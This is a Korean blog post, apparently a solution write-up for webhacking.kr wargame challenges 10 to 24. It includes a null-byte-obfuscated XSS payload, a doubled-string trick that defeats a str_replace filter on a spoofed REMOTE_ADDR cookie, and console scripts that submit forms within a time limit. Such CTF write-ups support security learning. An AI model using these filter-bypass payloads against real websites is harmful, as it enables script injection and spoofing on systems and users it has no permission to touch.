10.
개발자 도구로 들어가서 left속성을 799로 만들어준 후 한번 더 클릭하면 클리어. 크롬에서 안될수도 있는데 IE로 하면 된다.(IE도 F12누르면 동일하게 개발자도구 나옴.)
14.
<script>
function ck()
{
var ul=document.URL;
ul=ul.indexOf(".kr");
ul=ul*30;
if(ul==pw.input_pwd.value) { alert("Password is "+ul*pw.input_pwd.value); }
else { alert("Wrong"); }
}
</script>에서
var ul=document.URL;
ul=ul.indexOf(".kr");
ul=ul*30;
부분만 콘솔에 넣고 돌려보면 ul=510이 나옴. 입력하면 답 출력.
15.
view-source:http://webhacking.kr/challenge/javascript/js2.html
로 보거나 자바스크립트 끄기.
16.
<script>
document.body.innerHTML+="<font color=yellow id=aa style=position:relative;left:0;top:0>*</font>";
function mv(cd)
{
kk(star.style.posLeft-50,star.style.posTop-50);
if(cd==100) star.style.posLeft=star.style.posLeft+50;
if(cd==97) star.style.posLeft=star.style.posLeft-50;
if(cd==119) star.style.posTop=star.style.posTop-50;
if(cd==115) star.style.posTop=star.style.posTop+50;
if(cd==124) location.href=String.fromCharCode(cd);
}
잘 보면 cd가 124일때만 다른동작을 함. 링크를 String.fromCharCode(cd)로 잡으므로 끝에 원래 주소대신 124의 아스키코드값인 |만 붙여주면 통과
17.
20. 개발자도구 콘솔로
document.lv5frm.id.value = 'hi';
document.lv5frm.cmt.value = 'hi';
document.lv5frm.hack.value = document.lv5frm.attackme.value;
lv5frm.submit();
를 2초안에 복붙실행
23.
<s%00c%00r%00i%00p%00t>a%00l%00e%00r%00t%00(1);</s%00c%00r%00i%00p%00t>
처럼 널바이트를 사이사이에 넣어줌.
24.
REMOTE_ADDR이라는 쿠키에서 값을 가져와서
if($_COOKIE[REMOTE_ADDR])
{
$ip=str_replace("12","",$ip);
$ip=str_replace("7.","",$ip);
$ip=str_replace("0.","",$ip);
}
이렇게 변환을 시켜주는데 없어지지 않도록 XSS에서 하듯이 두번씩 써주면 됨.
112277..00..00..1
'webhacking > client' 카테고리의 다른 글
hack this site JavaScript 1~7 (0) | 2015.01.20 |
---|---|
TheBlackSheep Javascript 1~8 (0) | 2015.01.12 |
Security Override Javascript 1~8 (0) | 2014.12.19 |
Net-Force javascript 7 (0) | 2014.12.04 |
Net-Force javascript 6 (0) | 2014.12.04 |